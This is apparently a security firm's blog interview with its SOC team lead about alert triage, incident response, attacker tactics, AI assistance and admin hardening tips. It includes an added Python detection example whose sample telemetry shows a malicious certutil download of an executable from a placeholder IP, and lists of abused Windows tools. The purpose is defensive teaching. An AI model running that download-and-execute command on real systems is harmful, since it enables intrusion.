Christoph Schulze has been working for the German cyber defence specialist in Bochum since 2022. He heads the Managed SOC analyst team, which works 24/7 to ensure that cyber attacks are stopped immediately before they cause serious damage.

What does a typical working day look like for you and your team?
Christoph Schulze: My working day usually starts with a look at the handover and the messages from the analysts on the night shift. Since our team works around the clock, it is important to know first thing in the morning whether there are any incidents with customers or open issues. I then plan my day, work through my tasks and prepare for upcoming meetings. As a team leader, I am in frequent contact with other departments such as development and customer service. I also take on organisational functions and support my people with questions or more complex cases. At the same time, I also look at malicious actions that have occurred at customers' sites. This helps me to optimise processes and develop new ideas for our threat hunting – the proactive search for previously unknown threats in IT systems.
Our analysts' daily routine is slightly different: they also start with a shift handover before turning their attention to incoming alerts. They check whether these are harmless activities or critical incidents. They are in constant close contact with each other so that they can initiate a more in-depth analysis in case of doubt. It is important that every event is reliably assessed and documented so that our customers are protected at all times. At the end of the shift, there is another handover. This ensures that our Managed Security Operations Centre functions seamlessly and effectively around the clock.
How do cybercriminals try to gain access to IT systems? What are some typical actions you observe attackers taking?
Christoph Schulze: Cybercriminals primarily use phishing to gain initial access to a system. This is done via specially crafted email attachments that appear to contain business-related content, such as alleged salary tables. Another method involves links in emails that lead to fake websites and request access data. It is striking that many campaigns are very professionally tailored to specific companies. This makes them difficult to distinguish from legitimate communication.
Once an attacker has completed this first step, a backdoor is often installed. This can be used to download additional commands. Today, attackers use legitimate Windows on-board tools and administrator tools to operate within the network, exfiltrate data or initiate encryption processes. Because these activities appear to be normal processes at first glance, detection is difficult. It is therefore important to block phishing directly – either by raising employee awareness or by using reliable security solutions.
When does your team spring into action? How does the analysis and response process work?
Christoph Schulze: Our SOC team springs into action as soon as a customer system reports suspicious behaviour. The sensors then provide us with a wealth of information – from process chains and executed commands to affected users or files. On this basis, the analysts first check whether it is a genuine security incident or just a false alarm. If it is indeed an incident, we delve deeper into the analysis. To do this, we connect directly to the affected system, check running processes and services, and examine suspicious files. If a threat is confirmed, the actual response follows. Depending on the situation, we isolate compromised systems, move suspicious files into quarantine or remove attacker artefacts. We also restore falsely blocked files if an alarm turns out to be harmless.
At the same time, we keep the customer informed at all times and provide specific recommendations for action. These range from immediate measures to longer-term advice on how to reduce risks in the future. In this way, we not only ensure that attacks are stopped, but also that the causes are understood and vulnerabilities are closed.
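As an added illustration of the behaviour-based triage the two answers above describe (a phishing attachment leading to a backdoor that then drives legitimate Windows on-board tools, and the analysts' check of process chains and executed commands), here is example code that is not part of the interview or of any vendor product. The telemetry lines, the field layout, the tool list and the scoring weights are constructed assumptions for the demonstration.

```python
from collections import namedtuple

# One process-creation event: ts|host|user|pid|ppid|image|command line (constructed layout)
Event = namedtuple("Event", "ts host user pid ppid image cmdline")

# Constructed sample telemetry, not real customer data: a Word document spawning
# PowerShell and certutil, plus a legitimate scheduled backup script for contrast.
SAMPLE_EVENTS = r"""
2024-05-02T08:14:03Z|WS-FIN-07|j.mueller|4120|3300|winword.exe|WINWORD.EXE /n Gehaltstabelle_2024.docm
2024-05-02T08:14:09Z|WS-FIN-07|j.mueller|4188|4120|powershell.exe|powershell -nop -w hidden -enc <omitted>
2024-05-02T08:14:11Z|WS-FIN-07|j.mueller|4201|4188|certutil.exe|certutil -urlcache -split -f http://203.0.113.9/u.txt C:\Users\Public\u.exe
2024-05-02T08:20:41Z|WS-IT-02|a.schmidt|5010|2000|powershell.exe|powershell -File C:\Scripts\backup.ps1
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ONBOARD_TOOLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                 "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Command-line indicators and their assumed weights; in practice these are tuned per customer.
CMDLINE_INDICATORS = {"-enc": 20, "encodedcommand": 20, "urlcache": 20, "hidden": 10, "http": 10, "-nop": 10}

def parse_events(text):
    rows = (line.split("|", 6) for line in text.strip().splitlines())
    return [Event(ts, h, u, int(pid), int(ppid), img.lower(), cmd) for ts, h, u, pid, ppid, img, cmd in rows]

def office_ancestor(ev, by_pid):
    # Walk the parent chain on the same host; return the Office image if one is an ancestor
    cur, seen = by_pid.get((ev.host, ev.ppid)), set()
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        if cur.image in OFFICE_APPS:
            return cur.image
        cur = by_pid.get((cur.host, cur.ppid))

def triage(events):
    """Score every on-board tool execution by its ancestry and its command line."""
    by_pid = {(e.host, e.pid): e for e in events}
    findings = []
    for e in events:
        if e.image not in ONBOARD_TOOLS:
            continue  # e.g. the Word process itself is not scored
        score, reasons = 0, []
        if origin := office_ancestor(e, by_pid):
            score, reasons = 50, [f"descends from {origin}"]
        hits = [t for t in CMDLINE_INDICATORS if t in e.cmdline.lower()]
        score += sum(CMDLINE_INDICATORS[t] for t in hits)
        reasons += [f"command line contains {t!r}" for t in hits]
        verdict = "critical" if score >= 60 else "review" if score >= 30 else "benign"
        findings.append({"ts": e.ts, "host": e.host, "user": e.user, "image": e.image,
                         "score": score, "verdict": verdict, "reasons": reasons})
    return findings
```

The backup script on WS-IT-02 runs the same binary as the malicious chain but has no Office ancestor and no suspicious switches, so it lands at "benign", which is the false-alarm distinction the analysts make before any response.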
How quickly do you respond to harmful incidents affecting a customer?
Christoph Schulze: It's difficult to give a general time frame because the response always depends on the type and severity of the incident. Basically, the automatic response kicks in immediately as soon as suspicious behaviour is detected. For example, the system isolates files or processes even before an analyst intervenes. At the same time, our team immediately begins its analysis. Critical alerts have the highest priority. In less serious cases, we usually inform the customer within 20 to 40 minutes with specific recommendations for action. However, if it is a serious attack, a system is isolated within a very short time and the company is contacted directly. It is important for us to strike a balance: we react quickly, but not rashly. A hasty measure that ultimately affects the customer's systems helps no one. Through a combination of automatic detection, rapid human analysis and clear prioritisation, we ensure that incidents are detected, classified and defused as quickly as possible.
When responding to an incident, how do you ensure that you have made the right decision?
Christoph Schulze: We always weigh up very carefully whether or not to intervene – for example, when it comes to central systems such as a company's domain controller. In such cases, we act with particular caution and coordination. Experience is an important factor. With each new customer, we learn typical patterns and develop a sense of what is normal behaviour and what indicates an attack. We share this knowledge within the team through documentation, joint analyses and regular workshops. We also simulate attack scenarios in test environments to practise what real incidents look like and what responses are appropriate.
In everyday life, we are helped by clearly prioritising alerts that have already been assigned a criticality rating and description by our detection and protection engineers. This allows us to quickly assess whether an incident is harmless or whether immediate action is required. We rarely make critical decisions alone, but actively consult with colleagues. This ensures that multiple perspectives are always taken into account in the assessment.
Ultimately, the goal is to minimise the damage to the customer. When in doubt, we would rather isolate a user's computer too early than allow a real attack to continue unchecked. This combination of experience, teamwork and continuous training ensures that our responses are well-founded and appropriate, even under time pressure.

What role does artificial intelligence play in your work? Could AI replace you in general?
Christoph Schulze: Artificial intelligence plays an important role for us – especially in the analysis of large amounts of data. AI-based systems can recognise patterns very quickly, identify recurring false alarms and thus relieve the analyst team. This is a great advantage, especially when there are thousands of incidents per day. It separates the wheat from the chaff and helps us to identify the really critical cases more quickly.
Nevertheless, artificial intelligence is not a substitute for human analysts, but rather a useful addition. Attacks rarely follow a set pattern, and outliers or new attack techniques in particular can only be reliably assessed through experience, contextual knowledge and flexibility. That's why humans always remain in control, checking AI assessments and ultimately making the decisions.
In everyday life, we use AI selectively as a sparring partner, for example to present information in a bundled form or to get food for thought for the analyst team – without feeding in customer data, of course. However, humans remain indispensable for the actual response, because every measure must be tailored to the individual customer and situation. In the long term, AI will primarily help us to manage the mass of data more efficiently and prevent alert fatigue (fatigue due to too many alerts). However, the responsibility for correctly classifying attacks and responding appropriately remains clearly with the analyst.
Is there a customer case that particularly sticks in your mind?
Christoph Schulze: One case that particularly sticks in my mind involves a newly discovered SharePoint security vulnerability. Attackers were able to use it to place backdoors on servers and take control. Just a few hours after the public announcement, we actually received an alert from a customer: a corresponding file had been stored. Since our team of analysts had already prepared a detection, we were able to respond immediately, move the file to quarantine and isolate the affected systems. That same night, we informed the customer by telephone and took further steps together. A forensic analysis later confirmed that no damage had been done. This is an example of how important rapid response and close cooperation are.
A second case shows the other side of the coin: On Christmas Eve, a customer scheduled a penetration test without informing us in advance. We detected the attack, isolated the system and tried unsuccessfully to contact the customer – we only received a response several days later. Although the test was harmless, it highlighted how risky it can be to be unavailable. This is particularly true when questions need to be clarified and the customer needs to help with the response. If it had been a real attack, no one would have been able to respond. For us, this was a striking example of how important not only technology but also awareness and clear processes are.
Do you often have to take action outside of business hours? How do you contact customers in these cases?
Christoph Schulze: For us, there is no such thing as ‘outside business hours’. Customer systems run around the clock, and so does our monitoring. Accordingly, we receive alerts at any time – from automated vulnerability scans and backup processes to confirmed attacks.
If an incident is critical, we first inform the customer in writing and then pick up the phone. Each company has emergency contacts on file, which we call until we reach someone. This usually works very reliably – the exception mentioned on Christmas Eve was a special case. It is important that we can implement most of the urgent measures ourselves, even if the customer is not available at short notice. Systems are isolated, malicious files are moved to quarantine, or processes are terminated. The company then receives a summary and specific recommendations for action. This ensures that an attack can be stopped at any time, whether on weekdays, at night, or on weekends.
Do you have any tips for IT administrators on what they can do to improve security in their network with simple measures?
Christoph Schulze: The most effective measure does not start with the firewall, but with people. Training and regular phishing simulations significantly reduce the most common attack vector. At the same time, IT managers should ensure that only systems that are really needed are accessible from the internet. Components that do not require external access belong behind internal networks or VPNs.
Technically, patch management is key. Critical security updates should be installed promptly because vulnerabilities that have become public are quickly exploited by attackers using automated methods. In addition, password managers and multi-factor authentication significantly increase protection against the spying of access data for services.
In operation, strict allocation of user rights pays off. This includes: admin rights only for actually authorised persons, immediately terminating sessions and processes with elevated rights when they are no longer needed, and enforcing admin sessions that are as short-lived as possible. In this way, IT managers reduce the attack surface.
Finally, backups, network segmentation and behaviour-based detection, such as our Managed Security Operations Centre, should be standard equipment. Regular tests, joint exercises and clear emergency contacts round off the package of measures and ensure that technical precautions are also used effectively in an emergency.
How often do you rely on active cooperation from customers to resolve incidents?
Christoph Schulze: In most cases, we can analyse and contain incidents independently. We rarely need active cooperation from customers. This is usually when we send recommendations for action and need feedback on whether they have been taken and implemented. This is the minimum we need to rely on to ensure that everyone involved is on the same page.
Beyond that, there are individual situations in which we need the customer's support. For example, when we need to clarify whether certain tools – such as network scanners – are being used legitimately or whether they are potential attack tools. We may also request suspicious files in order to further improve our detection systems.
There have already been two articles in the blog series ‘The minds behind Managed SOC’. Andy Felbinger kicked things off with questions and answers about sales. Tobias Misse then talked about onboarding. For the next article, I will be switching sides and talking to a partner. Stay tuned!